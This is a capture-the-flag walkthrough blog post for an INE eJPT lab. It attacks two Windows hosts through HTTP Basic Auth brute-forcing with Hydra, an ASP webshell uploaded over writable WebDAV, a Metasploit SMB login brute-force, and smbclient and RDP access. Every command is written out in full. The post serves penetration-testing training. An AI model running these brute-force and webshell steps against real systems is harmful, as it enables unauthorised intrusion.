A walkthrough covering HTTP brute-forcing, WebDAV exploitation, and SMB enumeration to capture all four flags
Hello everyone! 👋
In this blog, I’ll walk through the System/Host-Based Attacks CTF 1 from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning — not just dropping commands.
This lab has two Windows targets: target1.ine.local and target2.ine.local. The goal is to capture four flags hidden across both machines using system and host-based attack techniques.
Useful files provided by the lab:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/webshells/asp/webshell.aspSo, let’s dive in.
Q. User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)
As usual, I started with an Nmap scan to identify the running services.
nmap -sV -sC -T5 target1.ine.localPress enter or click to view image in full size
The scan showed that port 80 was open running Microsoft IIS 10.0, but it returned a 401 Unauthorized — meaning it was protected by HTTP Basic Authentication. Ports 135, 139, 445 (SMB), and 3389 (RDP) were also open.
I navigated to http://target1.ine.local in the browser and it immediately asked for credentials.
Press enter or click to view image in full size
Since the question already hinted that Bob might have a weak password, I decided to brute-force his password using Hydra and a common password list.
hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /Press enter or click to view image in full size
Hydra successfully identified Bob’s password.
Now I had valid credentials. I logged in, I didn’t find anything useful on the homepage, so I moved on to directory enumeration with DIRB.
dirb http://target1.ine.local -u bob:<password>Press enter or click to view image in full size
DIRB found two directories — /aspnet_client/ and /webdav/. The WebDAV directory was listable, so I navigated straight to it: http://target1.ine.local/webdav/
Press enter or click to view image in full size
And there it was — flag1.txt sitting right in the directory listing.
Q. Valuable files are often on the C:\ drive. Explore it thoroughly. (target1.ine.local)
Since WebDAV was open and writable, I first ran DAVTest to check which file types the server would accept and execute:
davtest -auth bob:<Password> -url http://target1.ine.local/webdavPress enter or click to view image in full size
.asp files were both uploadable and executable — exactly what I needed, since the lab provides a pre-built ASP webshell.
I used Cadaver (a command-line WebDAV client) to upload it:
cadaver http://target1.ine.local
dav:/> cd webdav
dav:/webdav/> put /usr/share/webshells/asp/webshell.aspPress enter or click to view image in full size
After uploading the shell, I accessed it from the browser.
http://target1.ine.local/webdav/webshell.aspThe shell executed successfully and allowed command execution on the target.
Get Suraj Apar’s stories in your inbox
Join Medium for free to get updates from this writer.
From there, I started enumerating the contents of the C:\ drive.
Press enter or click to view image in full size
The C: drive listing came back — and flag2.txt was sitting right there in the root.
Q. SMB shares might contain hidden files. Check the available shares. (target2.ine.local)
The question hinted toward SMB enumeration, so I started with another Nmap scan.
Press enter or click to view image in full size
No web server this time. But port 445 (SMB) and port 3389 (RDP) were both open — running Windows Server 2008 R2–2012.
I used Metasploit’s smb_login module to brute-force the Administrator account:
use auxiliary/scanner/smb/smb_login
set rhost target2.ine.local
set SMBUser administrator
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set verbose false
runPress enter or click to view image in full size
Got it on the first run.
With valid credentials, I listed the available SMB shares:
smbclient -L //target2.ine.local -U administratorPress enter or click to view image in full size
Several shares came back — ADMIN$, C$, IPC$, Shared, Shared2, Shared3. The C$ administrative share looked most interesting, so I connected to it:
smbclient //target2.ine.local/C$ -U administratorPress enter or click to view image in full size
Right there in the C: drive root — flag3.txt.
Q. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)
Still in the same smbclient session, the hint was straightforward — check the Desktop:
smb: \> ls .\Users\Administrator\Desktop\Press enter or click to view image in full size
Inside the Desktop folder, I found the fourth flag.
Bonus: RDP Access
Since port 3389 was open and we had valid Administrator credentials from the SMB brute-force, I couldn’t resist trying RDP:
xfreerdp /u:administrator /p:<Password> /v:target2.ine.local:3389Press enter or click to view image in full size
Accepted the self-signed certificate and got a full Windows Server desktop. Complete access — no further exploitation needed.
Final Thoughts
This CTF is a solid exercise in chaining simple techniques together. No complex exploits — just weak passwords, a misconfigured WebDAV server, and an exposed SMB share doing all the damage.
The big lesson here: credentials are everything. Both targets fell because of weak passwords. Once you have valid credentials, the rest is just enumeration. And the same Administrator password that cracked SMB also opened RDP — a reminder that credential reuse is one of the most reliable pivot points in any engagement.
Thanks for reading!